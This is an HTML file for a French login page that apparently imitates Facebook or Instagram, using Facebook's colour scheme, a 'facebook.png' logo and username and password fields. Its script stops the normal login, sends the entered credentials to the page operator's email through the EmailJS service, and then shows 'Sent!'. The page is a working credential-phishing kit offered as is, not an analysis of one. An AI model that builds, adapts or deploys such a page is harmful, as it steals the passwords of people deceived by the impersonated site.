<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Page de Connexion</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f2f5;
            margin: 0;
            padding: 0;
        }

        .container {
            max-width: 400px;
            margin: 100px auto;
            background-color: #fff;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            padding: 20px;
        }

        header h1 {
            text-align: center;
            color: #1877f2;
        }

        #form input {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ddd;
            border-radius: 4px;
        }

        #form button {
            width: 100%;
            padding: 10px;
            background-color: #1877f2;
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }
        .logo {
            margin-bottom: 20px;
        }

        .logo img {
            width: 150px;
            margin-left: 120px;
        }

        .forgot-password {
            text-align: center;
            color: #1877f2;
            cursor: pointer;
        }

        footer {
            margin-top: 20px;
            text-align: center;
        }

        footer a {
            color: #1877f2;
            text-decoration: none;
        }

        footer a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="facebook.png" alt="Instagram Logo">
        </div>
        <form id="form">
            <input type="text" id="email" name="email" placeholder="Nom d'utilisateur" autocomplete="username"> <!-- Ajout de l'attribut autocomplete -->
            <input type="password" id="password" name="password" placeholder="Mot de passe" autocomplete="current-password"> <!-- Ajout de l'attribut autocomplete -->
            <button type="submit" value="send email" id="button" name="button">Connexion</button> <!-- Ajout de l'attribut name -->
            <div class="forgot-password">Mot de passe oublié?</div>
        </form>
        <footer>
            <p>Vous n'avez pas de compte? <a href="#">Inscrivez-vous</a></p>
        </footer>
    </div>

<script type="text/javascript"
  src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>

<script type="text/javascript">
  emailjs.init('b8BrXyea9nSWawnII')
</script>

    <script>

        const btn = document.getElementById('button');

document.getElementById('form')
 .addEventListener('submit', function(event) {
   event.preventDefault();

   btn.value = 'Sending...';

   const serviceID = 'default_service';
   const templateID = 'template_msdkbaj';

   emailjs.sendForm(serviceID, templateID, this)
    .then(() => {
      btn.value = 'Send Email';
      alert('Sent!');
    }, (err) => {
      btn.value = 'Send Email';
      alert(JSON.stringify(err));
    });
});
    </script>

</body>
</html>
